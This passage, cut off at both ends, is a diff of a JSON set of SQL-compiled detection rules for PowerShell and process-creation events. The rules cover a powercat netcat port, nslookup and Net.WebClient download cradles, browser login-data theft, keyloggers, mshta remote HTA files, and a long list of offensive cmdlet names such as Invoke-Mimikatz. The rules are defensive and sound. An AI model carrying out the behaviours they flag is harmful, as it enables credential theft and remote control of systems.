AND NOT ((ScriptBlockText LIKE '%CmdletsToExport = @(%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostApplication LIKE '%Get-WmiObject%' ESCAPE '\\' AND HostApplication LIKE '% Win32\\_Shadowcopy%' ESCAPE '\\' AND (HostApplication LIKE '%Delete()%' ESCAPE '\\' OR HostApplication LIKE '%Remove-WmiObject%' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_export_pfxcertificate.yml" + "filename": "posh_pc_delete_volume_shadow_copies.yml" }, { - "title": "AADInternals PowerShell Cmdlets Execution - PsScript", - "id": "91e69562-2426-42ce-a647-711b8152ced6", - "status": "experimental", - "description": "Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. Which can be abused by threat actors to attack Azure AD or Office 365.", - "author": "Austin Songer (@austinsonger), Nasreddine Bencherchali (Nextron Systems)", + "title": "Netcat The Powershell Version", + "id": "c5b20776-639a-49bf-94c7-84f912b91c15", + "status": "test", + "description": "Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network", + "author": "frack113", "tags": [ - "attack.execution", - "attack.reconnaissance", - "attack.discovery", - "attack.credential_access", - "attack.impact" + "attack.command_and_control", + "attack.t1095" ], "falsepositives": [ - "Legitimate use of the library for administrative activity" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Add-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertTo-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Disable-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Grant-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Install-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Join-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Open-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Read-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Register-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Restore-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Search-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Send-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Update-AADInt%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND (HostApplication LIKE '%powercat %' ESCAPE '\\' OR HostApplication LIKE '%powercat.ps1%' ESCAPE '\\'))" ], - "filename": "posh_ps_aadinternals_cmdlets_execution.yml" + "filename": "posh_pc_powercat.yml" }, { - "title": "Access to Browser Login Data", - "id": "fc028194-969d-4122-8abe-0470d5b8f12f", - "status": "test", - "description": "Adversaries may acquire credentials from web browsers by reading files specific to the target browser.\nWeb browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future.\nWeb browsers typically store the credentials in an encrypted format within a credential store.\n", - "author": "frack113", + "title": "Nslookup PowerShell Download Cradle", + "id": "999bff6d-dc15-44c9-9f5c-e1051bfc86e1", + "status": "experimental", + "description": "Detects suspicious powershell download cradle using nslookup. This cradle uses nslookup to extract payloads from DNS records", + "author": "Sai Prashanth Pulisetti @pulisettis, Aishwarya Singam", "tags": [ - "attack.credential_access", - "attack.t1555.003" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Copy-Item%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Destination%' ESCAPE '\\' AND (ScriptBlockText LIKE '%\\\\Opera Software\\\\Opera Stable\\\\Login Data%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Mozilla\\\\Firefox\\\\Profiles%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Microsoft\\\\Edge\\\\User Data\\\\Default%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\Login Data%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\Login Data For Account%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostApplication LIKE '%powershell%' ESCAPE '\\' AND HostApplication LIKE '%nslookup%' ESCAPE '\\' AND (HostApplication LIKE '%-q=txt%' ESCAPE '\\' OR HostApplication LIKE '%-querytype=txt%' ESCAPE '\\'))" ], - "filename": "posh_ps_access_to_browser_login_data.yml" + "filename": "posh_pc_abuse_nslookup_with_dns_records.yml" }, { - "title": "Potential Keylogger Activity", - "id": "965e2db9-eddb-4cf6-a986-7a967df651e4", + "title": "Suspicious PowerShell Download", + "id": "3236fcd0-b7e3-4433-b4f8-86ad61a9af2d", "status": "experimental", - "description": "Detects PowerShell scripts that contains reference to keystroke capturing functions", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious PowerShell download command", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.collection", - "attack.credential_access", - "attack.t1056.001" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "PowerShell scripts that download content from the Internet" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%[Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostApplication LIKE '%Net.WebClient%' ESCAPE '\\' AND (HostApplication LIKE '%.DownloadFile(%' ESCAPE '\\' OR HostApplication LIKE '%.DownloadString(%' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_keylogger_activity.yml" + "filename": "posh_pc_susp_download.yml" }, { - "title": "Execution via CL_Mutexverifiers.ps1", - "id": "39776c99-1c7b-4ba0-b5aa-641525eee1a4", + "title": "Alternate PowerShell Hosts", + "id": "d7326048-328b-4d5e-98af-86e84b17c765", "status": "test", - "description": "Detects Execution via runAfterCancelProcess in CL_Mutexverifiers.ps1 module", - "author": "oscd.community, Natalia Shornikova", + "description": "Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.defense_evasion", - "attack.t1216" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Programs using PowerShell directly without invocation of a dedicated interpreter", + "MSP Detection Searcher", + "Citrix ConfigSync.ps1" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%CL\\_Mutexverifiers.ps1%' ESCAPE '\\' AND ScriptBlockText LIKE '%runAfterCancelProcess%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '400' AND Channel = 'Windows PowerShell') AND HostApplication LIKE '%' ESCAPE '\\' AND NOT ((HostApplication LIKE 'powershell%' ESCAPE '\\' OR HostApplication LIKE 'C:\\\\WINDOWS\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe%' ESCAPE '\\') OR ContextInfo LIKE '%Citrix\\\\ConfigSync\\\\ConfigSync.ps1%' ESCAPE '\\'))" ], - "filename": "posh_ps_cl_mutexverifiers_lolscript.yml" + "filename": "posh_pc_alternate_powershell_hosts.yml" }, { - "title": "Windows Screen Capture with CopyFromScreen", - "id": "d4a11f63-2390-411c-9adf-d791fd152830", - "status": "experimental", - "description": "Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation.\nScreen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations\n", - "author": "frack113", + "title": "Visual Studio NodejsTools PressAnyKey Arbitrary Binary Execution", + "id": "a20391f8-76fb-437b-abc0-dba2df1952c6", + "status": "test", + "description": "Detects child processes of Microsoft.NodejsTools.PressAnyKey.exe that can be used to execute any other binary", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1113" + "attack.execution", + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Unknown" + "Legitimate use by developers as part of NodeJS development with Visual Studio Tools" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%.CopyFromScreen%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\Microsoft.NodejsTools.PressAnyKey.exe' ESCAPE '\\')" ], - "filename": "posh_ps_capture_screenshots.yml" + "filename": "proc_creation_win_pressanykey_lolbin_execution.yml" }, { - "title": "Import PowerShell Modules From Suspicious Directories", - "id": "21f9162c-5f5d-4b01-89a8-b705bd7d10ab", + "title": "Application Whitelisting Bypass via PresentationHost.exe", + "id": "d22e2925-cfd8-463f-96f6-89cec9d9bc5f", "status": "experimental", - "description": "Detects powershell scripts that import modules from suspicious directories", + "description": "Detects usage of \"PresentationHost\" which is a utility that runs \".xbap\" (Browser Applications) files. It can be abused to run malicious \".xbap\" files any bypass AWL", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.defense_evasion", "attack.execution", - "attack.t1059.001" + "attack.t1218" ], "falsepositives": [ - "Unknown" + "Legitimate \".xbap\" being executed via \"PresentationHost\"" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Import-Module \"$Env:Temp\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%Import-Module ''$Env:Temp\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%Import-Module $Env:Temp\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%Import-Module \"$Env:Appdata\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%Import-Module ''$Env:Appdata\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%Import-Module $Env:Appdata\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%Import-Module C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%ipmo \"$Env:Temp\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%ipmo ''$Env:Temp\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%ipmo $Env:Temp\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%ipmo \"$Env:Appdata\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%ipmo ''$Env:Appdata\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%ipmo $Env:Appdata\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%ipmo C:\\\\Users\\\\Public\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\presentationhost.exe' ESCAPE '\\' OR OriginalFileName = 'PresentationHost.exe') AND CommandLine LIKE '%.xbap%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Program Files%' ESCAPE '\\')))" ], - "filename": "posh_ps_import_module_susp_dirs.yml" + "filename": "proc_creation_win_lolbin_presentationhost.yml" }, { - "title": "Powershell Execute Batch Script", - "id": "b5522a23-82da-44e5-9c8b-e10ed8955f88", - "status": "test", - "description": "Adversaries may abuse the Windows command shell for execution.\nThe Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems.\nThe Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands.\nBatch files (ex: .bat or .cmd) also provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops.\nCommon uses of batch files include long or repetitive tasks, or the need to run the same set of commands on multiple system\n", + "title": "Suspicious ConfigSecurityPolicy Execution", + "id": "1f0f6176-6482-4027-b151-00071af39d7e", + "status": "experimental", + "description": "Upload file, credentials or data exfiltration with Binary part of Windows Defender", "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.003" + "attack.exfiltration", + "attack.t1567" ], "falsepositives": [ - "Legitimate administration script" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Start-Process%' ESCAPE '\\' AND (ScriptBlockText LIKE '%.cmd%' ESCAPE '\\' OR ScriptBlockText LIKE '%.bat%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%ConfigSecurityPolicy.exe%' ESCAPE '\\' OR Image LIKE '%\\\\ConfigSecurityPolicy.exe' ESCAPE '\\' OR OriginalFileName = 'ConfigSecurityPolicy.exe') AND (CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%ftp://%' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_execute_batch_script.yml" + "filename": "proc_creation_win_lolbin_configsecuritypolicy.yml" }, { - "title": "Powershell Add Name Resolution Policy Table Rule", - "id": "4368354e-1797-463c-bc39-a309effbe8d7", + "title": "Potential Atlassian Confluence CVE-2021-26084 Exploitation Attempt", + "id": "245f92e3-c4da-45f1-9070-bc552e06db11", "status": "test", - "description": "Detects powershell scripts that adds a Name Resolution Policy Table (NRPT) rule for the specified namespace.\nThis will bypass the default DNS server and uses a specified server for answering the query.\n", - "author": "Borna Talebi", + "description": "Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2021-26084", + "author": "Bhabesh Raj", "tags": [ - "attack.impact", - "attack.t1565" + "attack.initial_access", + "attack.execution", + "attack.t1190", + "attack.t1059" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Add-DnsClientNrptRule%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Namesp%' ESCAPE '\\' AND ScriptBlockText LIKE '%-NameSe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\Atlassian\\\\Confluence\\\\jre\\\\bin\\\\java.exe' ESCAPE '\\' AND (CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%curl%' ESCAPE '\\' OR CommandLine LIKE '%ipconfig%' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%whoami%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\'))" ], - "filename": "posh_ps_add_dnsclient_rule.yml" + "filename": "proc_creation_win_exploit_cve_2021_26084_atlassian_confluence.yml" }, { - "title": "Service Registry Permissions Weakness Check", - "id": "95afc12e-3cbb-40c3-9340-84a032e596a3", - "status": "test", - "description": "Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services.\nAdversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start.\nWindows stores local service configuration information in the Registry under HKLM\\SYSTEM\\CurrentControlSet\\Services\n", - "author": "frack113", + "title": "Potential Arbitrary File Download Using Office Application", + "id": "4ae3e30b-b03f-43aa-87e3-b622f4048eed", + "status": "experimental", + "description": "Detects potential arbitrary file download using a Microsoft Office application", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1574.011" + "attack.defense_evasion", + "attack.t1202" ], "falsepositives": [ - "Legitimate administrative script" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%get-acl%' ESCAPE '\\' AND ScriptBlockText LIKE '%REGISTRY::HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' OR Image LIKE '%\\\\POWERPNT.EXE' ESCAPE '\\' OR Image LIKE '%\\\\WINWORD.exe' ESCAPE '\\') OR OriginalFileName IN ('Excel.exe', 'POWERPNT.EXE', 'WinWord.exe')) AND (CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\'))" ], - "filename": "posh_ps_get_acl_service.yml" + "filename": "proc_creation_win_office_arbitrary_cli_download.yml" }, { - "title": "Malicious PowerShell Commandlets - ScriptBlock", - "id": "89819aa4-bbd6-46bc-88ec-c7f7fe30efa6", - "status": "test", - "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", - "author": "Sean Metcalf, Florian Roth, Bartlomiej Czyz @bczyz1, oscd.community, Nasreddine Bencherchali, Tim Shelton, Mustafa Kaan Demir, Georg Lauenstein, Max Altgelt, Tobias Michalski, Austin Songer", + "title": "Remotely Hosted HTA File Executed Via Mshta.EXE", + "id": "b98d0db6-511d-45de-ad02-e82a98729620", + "status": "experimental", + "description": "Detects execution of the \"mshta\" utility with an argument containing the \"http\" keyword, which could indicate that an attacker is executing a remotely hosted malicious hta file", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.defense_evasion", "attack.execution", - "attack.discovery", - "attack.t1482", - "attack.t1087", - "attack.t1087.001", - "attack.t1087.002", - "attack.t1069.001", - "attack.t1069.002", - "attack.t1069", - "attack.t1059.001" + "attack.t1218.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Add-Exfiltration%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-Persistence%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-RegBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-RemoteRegBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-ScrnSaveBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Check-VM%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertTo-Rc4ByteStream%' ESCAPE '\\' OR ScriptBlockText LIKE '%Decrypt-Hash%' ESCAPE '\\' OR ScriptBlockText LIKE '%Do-Exfiltration%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enabled-DuplicateToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%Exploit-Jboss%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-Fruit%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-GPOLocation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-TrustedDocuments%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ApplicationHost%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ChromeDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ClipboardContents%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-FoxDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-GPPPassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-IndexedItem%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Keystrokes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LSASecret%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-PassHashes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegAlwaysInstallElevated%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegAutoLogon%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteBootKey%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteCachedCredential%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteLocalAccountHash%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteLSAKey%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteMachineAccountHash%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteNLKMKey%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RickAstley%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Screenshot%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-SecurityPackages%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ServiceFilePermission%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ServicePermission%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ServiceUnquoted%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-SiteListPassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-System%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-TimedScreenshot%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-UnattendedInstallFile%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Unconstrained%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-USBKeystrokes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-VaultCredential%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-VulnAutoRun%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-VulnSchTask%' ESCAPE '\\' OR ScriptBlockText LIKE '%Gupt-Backdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%HTTP-Login%' ESCAPE '\\' OR ScriptBlockText LIKE '%Install-ServiceBinary%' ESCAPE '\\' OR ScriptBlockText LIKE '%Install-SSP%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ADSBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AllChecks%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ARPScan%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AzureHound%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BackdoorLNK%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BadPotato%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BetterSafetyKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BypassUAC%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Carbuncle%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Certify%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ConPtyShell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-CredentialInjection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DAFT%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DCSync%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DinvokeKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DllInjection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DomainPasswordSpray%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DowngradeAccount%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-EgressCheck%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Eyewitness%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-FakeLogonScreen%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Farmer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Get-RBCD-Threaded%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Gopher%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Grouper%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-HandleKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ImpersonatedProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ImpersonateSystem%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-InteractiveSystemPowerShell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Internalmonologue%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Inveigh%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-InveighRelay%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-KrbRelay%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-LdapSignCheck%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Lockless%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MalSCCM%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Mimikatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Mimikittenz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MITM6%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NanoDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NetRipper%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NinjaCopy%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-OfficeScrape%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-OxidResolver%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-P0wnedshell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Paranoia%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PortScan%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PoshRatHttp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PostExfil%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellTCP%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellWMI%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PPLDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PsExec%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PSInject%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PsUaCme%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ReflectivePEInjection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ReverseDNSLookup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Rubeus%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-RunAs%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SafetyKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SauronEye%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SCShell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Seatbelt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ServiceAbuse%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ShadowSpray%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Sharp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Shellcode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SMBScanner%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Snaffler%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Spoolsample%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SpraySinglePassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SSHCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-StandIn%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-StickyNotesExtract%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SystemCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Tasksbackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Tater%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Thunderfox%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ThunderStruck%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-TokenManipulation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Tokenvator%' ESCAPE '\\' OR ScriptBlockText LIKE 